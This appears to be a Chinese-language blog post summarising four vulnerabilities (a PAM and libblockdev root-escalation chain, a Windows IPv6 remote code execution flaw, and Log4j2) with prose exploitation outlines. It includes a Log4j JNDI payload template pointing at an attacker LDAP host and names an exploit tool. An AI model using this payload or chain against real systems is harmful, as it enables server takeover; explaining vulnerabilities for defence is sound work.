CVE-2025-6018
漏洞介紹:
? ? ? ?該漏洞是Linux PAM(可插拔認證模塊)中的一個本地權限提升漏洞,主要存在于openSUSE Leap 15和SUSE Linux Enterprise 15的PAM配置中。由于PAM規則錯誤地將檢查條件設置為用戶存在SSH或TTY會話,而非用戶實際在物理控制臺前操作,導致非特權攻擊者能夠通過篡改環境變量,繞過Polkit的“allow_active”信任區域,從而獲取“allow_active”權限。
漏洞利用方法:
? ? ? ?攻擊者可以通過SSH登錄目標系統,利用PAM配置錯誤,使自己的會話被標記為“active seat”,從而獲得“allow_active”權限。
CVE-2025-6019
漏洞介紹:
? ? ? ?該漏洞是libblockdev庫中的一個本地權限提升漏洞,影響幾乎所有主流Linux發行版,包括Ubuntu、Debian、Fedora、openSUSE等。由于udisks守護進程在掛載文件系統時會調用libblockdev庫,而該庫在掛載時未使用nosuid和nodev標志,導致擁有“allow_active”權限的用戶可以利用此漏洞獲取root權限。
漏洞利用方法:
? ? ? ?攻擊者可以利用udisks的掛載功能,例如通過掛載帶有SUID-root shell的任意XFS鏡像,并請求udisks守護進程調整文件系統大小,由于掛載時未使用nosuid和nodev標志,攻擊者可以執行SUID-root shell,最終獲得root權限?。
? ? ? ? 這兩個漏洞可以被串聯利用,形成完整的攻擊鏈。攻擊者首先利用CVE-2025-6018獲取“allow_active”權限,然后利用CVE-2025-6019進一步提升權限至root,從而完全控制系統。
CVE-2024-38063
漏洞介紹:
? ? ? ?CVE-2024-38063是一個存在于 Windows TCP/IP 堆棧中的高危遠程代碼執行漏洞,CVSS 評分為 9.8。漏洞源于 Windows 在處理 IPv6 數據包時的整數下溢問題,攻擊者可發送特制的 IPv6 數據包觸發漏洞,進而實現遠程代碼執行或導致拒絕服務攻擊。該漏洞影響范圍廣泛,包括 Windows 10、Windows 11 以及多個版本的 Windows Server。
漏洞利用方法:
? ? ? ?攻擊者需要構造特制的 IPv6 數據包并發送給目標系統。利用漏洞需深入理解 Windows TCP/IP 協議棧處理數據包的機制,特別是 IPv6 擴展頭的處理方式。通過精心設計數據包的偏移和頭字段,可在數據包重組過程中引發緩沖區溢出,最終實現遠程代碼執行。目前雖有概念驗證代碼發布,但微軟暫無證據表明該漏洞在野外被積極利用。
Apache Log4j2
漏洞介紹:
? ? ? ?Apache Log4j2是一個基于 Java 的開源日志記錄工具,廣泛應用于業務系統開發。2021 年 11 月 24 日,阿里云安全團隊向 Apache 官方報告了 Log4j2 遠程代碼執行漏洞。該漏洞是由于 Log4j2 某些功能存在遞歸解析功能,攻擊者可直接構造惡意請求,觸發遠程代碼執行漏洞,從而獲得目標服務器權限,影響范圍廣泛,危害程度高。
漏洞利用方法:
? ? ??攻擊者需要構造惡意的 JNDI 注入數據包,例如通過記錄的 HTTP 請求頭(如 User-Agent)或表單參數等,向目標服務器發送類似 ${jndi:ldap://惡意URL/POC} 的 Payload。目標服務器的 Log4j2 組件會解析此數據并連接到攻擊者控制的 LDAP 或 RMI 服務,下載惡意的 Class 文件并在本地加載執行,從而實現遠程代碼執行。
? ? ? ?在實際操作中,可以利用工具如 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 創建監聽,構造并發送包含惡意 JNDI 注入的請求到目標服務器。如果漏洞存在,目標服務器會連接到攻擊者的監聽服務,攻擊者即可發送惡意類文件,利用漏洞獲得服務器的控制權限。
?結語???????????
可以被生活打敗
決不能被生活打倒
!!!